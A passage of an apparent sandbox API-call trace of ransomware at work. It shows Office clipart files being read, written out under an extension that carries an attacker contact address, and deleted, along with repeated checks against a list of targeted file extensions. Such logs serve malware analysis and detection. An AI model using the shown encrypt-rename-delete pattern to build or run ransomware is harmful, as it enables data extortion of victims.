dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0272.183] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.189] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00334_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0272.234] GetLastError () returned 0x0 [0272.234] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x5f8, lpOverlapped=0x0) returned 1 [0272.235] WriteFile (in: hFile=0x328, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x600, lpOverlapped=0x0) returned 1 [0272.236] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.236] WriteFile (in: hFile=0x328, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.236] SetEndOfFile (hFile=0x328) returned 1 [0272.236] CloseHandle (hObject=0x328) returned 1 [0272.236] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.236] SetEndOfFile (hFile=0x390) returned 1 [0272.238] CloseHandle (hObject=0x390) returned 1 [0272.238] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.239] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00334_.wmf")) returned 1 [0272.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63 [0272.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63 [0272.239] lstrlenW (lpString=".doc") returned 4 [0272.239] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.239] lstrlenW (lpString=".docx") returned 5 [0272.239] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.239] lstrlenW (lpString=".pdf") returned 4 [0272.239] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.240] lstrlenW (lpString=".xls") returned 4 [0272.240] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.240] lstrlenW (lpString=".xlsx") returned 5 [0272.240] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.240] lstrlenW (lpString=".ppt") returned 4 [0272.240] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63 [0272.240] lstrlenW (lpString=".zip") returned 4 [0272.240] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.240] lstrlenW (lpString=".rar") returned 4 [0272.240] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.240] lstrlenW (lpString=".bz2") returned 4 [0272.240] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.240] lstrlenW (lpString=".7z") returned 3 [0272.240] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63 [0272.240] lstrlenW (lpString=".dbf") returned 4 [0272.240] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63 [0272.240] lstrlenW (lpString=".1cd") returned 4 [0272.240] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63 [0272.240] lstrlenW (lpString=".jpg") returned 4 [0272.240] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63 [0272.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63 [0272.240] lstrlenW (lpString=".doc") returned 4 [0272.240] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.240] lstrlenW (lpString=".docx") returned 5 [0272.240] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.240] lstrlenW (lpString=".pdf") returned 4 [0272.240] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.241] lstrlenW (lpString=".xls") returned 4 [0272.241] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.241] lstrlenW (lpString=".xlsx") returned 5 [0272.241] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.241] lstrlenW (lpString=".ppt") returned 4 [0272.241] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63 [0272.241] lstrlenW (lpString=".zip") returned 4 [0272.241] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.241] lstrlenW (lpString=".rar") returned 4 [0272.241] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.241] lstrlenW (lpString=".bz2") returned 4 [0272.241] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.241] lstrlenW (lpString=".7z") returned 3 [0272.241] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63 [0272.241] lstrlenW (lpString=".dbf") returned 4 [0272.241] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63 [0272.241] lstrlenW (lpString=".1cd") returned 4 [0272.241] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63 [0272.241] lstrlenW (lpString=".jpg") returned 4 [0272.241] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.241] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.241] lstrlenW (lpString="HH00443_.WMF") returned 12 [0272.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00443_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0272.248] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=3298) returned 1 [0272.248] CloseHandle (hObject=0x390) returned 1 [0272.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00443_.wmf")) returned 0x20 [0272.272] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00443_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00443_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0272.388] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.388] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00443_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0272.389] GetLastError () returned 0x0 [0272.389] ReadFile (in: hFile=0x328, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0xce2, lpOverlapped=0x0) returned 1 [0272.405] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xcf0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xcf0, lpOverlapped=0x0) returned 1 [0272.406] ReadFile (in: hFile=0x328, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.406] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.406] SetEndOfFile (hFile=0x2a8) returned 1 [0272.406] CloseHandle (hObject=0x2a8) returned 1 [0272.406] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.406] SetEndOfFile (hFile=0x328) returned 1 [0272.409] CloseHandle (hObject=0x328) returned 1 [0272.409] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.410] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00443_.wmf")) returned 1 [0272.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63 [0272.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63 [0272.410] lstrlenW (lpString=".doc") returned 4 [0272.410] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.410] lstrlenW (lpString=".docx") returned 5 [0272.410] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.410] lstrlenW (lpString=".pdf") returned 4 [0272.410] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.410] lstrlenW (lpString=".xls") returned 4 [0272.410] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.410] lstrlenW (lpString=".xlsx") returned 5 [0272.410] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.410] lstrlenW (lpString=".ppt") returned 4 [0272.410] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63 [0272.410] lstrlenW (lpString=".zip") returned 4 [0272.410] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.410] lstrlenW (lpString=".rar") returned 4 [0272.410] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.410] lstrlenW (lpString=".bz2") returned 4 [0272.410] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.410] lstrlenW (lpString=".7z") returned 3 [0272.410] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63 [0272.411] lstrlenW (lpString=".dbf") returned 4 [0272.411] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63 [0272.411] lstrlenW (lpString=".1cd") returned 4 [0272.411] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63 [0272.411] lstrlenW (lpString=".jpg") returned 4 [0272.411] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63 [0272.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63 [0272.411] lstrlenW (lpString=".doc") returned 4 [0272.411] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.411] lstrlenW (lpString=".docx") returned 5 [0272.411] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.411] lstrlenW (lpString=".pdf") returned 4 [0272.411] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.411] lstrlenW (lpString=".xls") returned 4 [0272.411] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.411] lstrlenW (lpString=".xlsx") returned 5 [0272.411] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.411] lstrlenW (lpString=".ppt") returned 4 [0272.411] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63 [0272.411] lstrlenW (lpString=".zip") returned 4 [0272.411] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.411] lstrlenW (lpString=".rar") returned 4 [0272.411] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.411] lstrlenW (lpString=".bz2") returned 4 [0272.411] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.411] lstrlenW (lpString=".7z") returned 3 [0272.411] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63 [0272.412] lstrlenW (lpString=".dbf") returned 4 [0272.412] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63 [0272.412] lstrlenW (lpString=".1cd") returned 4 [0272.412] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 63 [0272.412] lstrlenW (lpString=".jpg") returned 4 [0272.412] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.412] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.412] lstrlenW (lpString="HH00601_.WMF") returned 12 [0272.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00601_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0272.412] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=1468) returned 1 [0272.412] CloseHandle (hObject=0x328) returned 1 [0272.412] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00601_.wmf")) returned 0x20 [0272.412] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00601_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00601_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0272.413] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.413] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00601_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0272.413] GetLastError () returned 0x0 [0272.413] ReadFile (in: hFile=0x328, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x5bc, lpOverlapped=0x0) returned 1 [0272.459] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0272.459] ReadFile (in: hFile=0x328, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.459] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.459] SetEndOfFile (hFile=0x2a8) returned 1 [0272.459] CloseHandle (hObject=0x2a8) returned 1 [0272.459] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.459] SetEndOfFile (hFile=0x328) returned 1 [0272.461] CloseHandle (hObject=0x328) returned 1 [0272.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.461] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00601_.wmf")) returned 1 [0272.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63 [0272.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63 [0272.462] lstrlenW (lpString=".doc") returned 4 [0272.462] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.462] lstrlenW (lpString=".docx") returned 5 [0272.462] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.462] lstrlenW (lpString=".pdf") returned 4 [0272.462] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.462] lstrlenW (lpString=".xls") returned 4 [0272.462] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.462] lstrlenW (lpString=".xlsx") returned 5 [0272.462] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.462] lstrlenW (lpString=".ppt") returned 4 [0272.462] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63 [0272.462] lstrlenW (lpString=".zip") returned 4 [0272.462] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.462] lstrlenW (lpString=".rar") returned 4 [0272.462] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.462] lstrlenW (lpString=".bz2") returned 4 [0272.462] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.462] lstrlenW (lpString=".7z") returned 3 [0272.462] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63 [0272.462] lstrlenW (lpString=".dbf") returned 4 [0272.463] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63 [0272.463] lstrlenW (lpString=".1cd") returned 4 [0272.463] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63 [0272.463] lstrlenW (lpString=".jpg") returned 4 [0272.463] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63 [0272.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63 [0272.463] lstrlenW (lpString=".doc") returned 4 [0272.463] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.463] lstrlenW (lpString=".docx") returned 5 [0272.463] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.463] lstrlenW (lpString=".pdf") returned 4 [0272.463] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.463] lstrlenW (lpString=".xls") returned 4 [0272.463] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.463] lstrlenW (lpString=".xlsx") returned 5 [0272.463] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.463] lstrlenW (lpString=".ppt") returned 4 [0272.463] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63 [0272.463] lstrlenW (lpString=".zip") returned 4 [0272.463] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.463] lstrlenW (lpString=".rar") returned 4 [0272.463] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.463] lstrlenW (lpString=".bz2") returned 4 [0272.463] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.464] lstrlenW (lpString=".7z") returned 3 [0272.464] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63 [0272.464] lstrlenW (lpString=".dbf") returned 4 [0272.464] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63 [0272.464] lstrlenW (lpString=".1cd") returned 4 [0272.464] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 63 [0272.464] lstrlenW (lpString=".jpg") returned 4 [0272.464] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.464] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.464] lstrlenW (lpString="HH00623_.WMF") returned 12 [0272.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00623_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.468] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=10644) returned 1 [0272.468] CloseHandle (hObject=0x388) returned 1 [0272.468] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00623_.wmf")) returned 0x20 [0272.469] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00623_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00623_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.469] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.469] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: 